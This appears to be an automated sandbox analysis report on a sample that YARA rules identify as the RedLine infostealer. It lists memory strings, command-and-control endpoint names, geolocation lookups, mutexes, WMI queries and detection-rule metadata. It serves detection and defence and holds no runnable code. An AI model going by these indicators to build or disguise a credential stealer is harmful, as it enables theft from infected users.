Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: MfzXU6tKOq.exe	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: RegSvcs.exe, 00000003.00000002.1992867983.00000000029C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: MfzXU6tKOq.exe, 00000000.00000002.1841237299.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.comne
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: MfzXU6tKOq.exe PID: 1860, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 744, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Code function: 0_2_006BD344	0_2_006BD344
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Code function: 0_2_04927278	0_2_04927278
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Code function: 0_2_04920006	0_2_04920006
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Code function: 0_2_04920040	0_2_04920040
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Code function: 0_2_0492726A	0_2_0492726A
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Code function: 0_2_06ABF260	0_2_06ABF260
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Code function: 0_2_06AB95F0	0_2_06AB95F0
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Code function: 0_2_06AB0560	0_2_06AB0560
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Code function: 0_2_06AB0550	0_2_06AB0550
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Code function: 0_2_06AB91B8	0_2_06AB91B8
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Code function: 0_2_06ABB100	0_2_06ABB100
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Code function: 0_2_06AB9E60	0_2_06AB9E60
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Code function: 0_2_06AB9A28	0_2_06AB9A28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00CAE7B0	3_2_00CAE7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00CADC90	3_2_00CADC90

Source: MfzXU6tKOq.exe, 00000000.00000002.1841259145.0000000004FA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs MfzXU6tKOq.exe
Source: MfzXU6tKOq.exe, 00000000.00000002.1838242652.000000000080E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs MfzXU6tKOq.exe
Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs MfzXU6tKOq.exe
Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs MfzXU6tKOq.exe
Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000033F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs MfzXU6tKOq.exe
Source: MfzXU6tKOq.exe, 00000000.00000002.1841978376.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs MfzXU6tKOq.exe
Source: MfzXU6tKOq.exe, 00000000.00000002.1838659193.00000000023F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs MfzXU6tKOq.exe
Source: MfzXU6tKOq.exe, 00000000.00000002.1838659193.00000000023F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs MfzXU6tKOq.exe
Source: MfzXU6tKOq.exe	Binary or memory string: OriginalFilenameCWHy.exe@ vs MfzXU6tKOq.exe

Source: MfzXU6tKOq.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.MfzXU6tKOq.exe.35c3ce0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: MfzXU6tKOq.exe PID: 1860, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 744, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: MfzXU6tKOq.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.MfzXU6tKOq.exe.4fa0000.4.raw.unpack, id.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.MfzXU6tKOq.exe.340e790.3.raw.unpack, id.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, MnoQnNNBEfx1yMu4gx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, SXBl9DUuhnByiBQ9xl.cs	Security API names: _0020.SetAccessControl
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, SXBl9DUuhnByiBQ9xl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, SXBl9DUuhnByiBQ9xl.cs	Security API names: _0020.AddAccessRule
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, MnoQnNNBEfx1yMu4gx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, SXBl9DUuhnByiBQ9xl.cs	Security API names: _0020.SetAccessControl
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, SXBl9DUuhnByiBQ9xl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, SXBl9DUuhnByiBQ9xl.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/44@1/1

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MfzXU6tKOq.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Mutant created: \Sessions\1\BaseNamedObjects\ANUmbguURsnpHKUWDittdYvd
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Local\Temp\tmp6D47.tmp

Jump to behavior

Source: MfzXU6tKOq.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: MfzXU6tKOq.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe

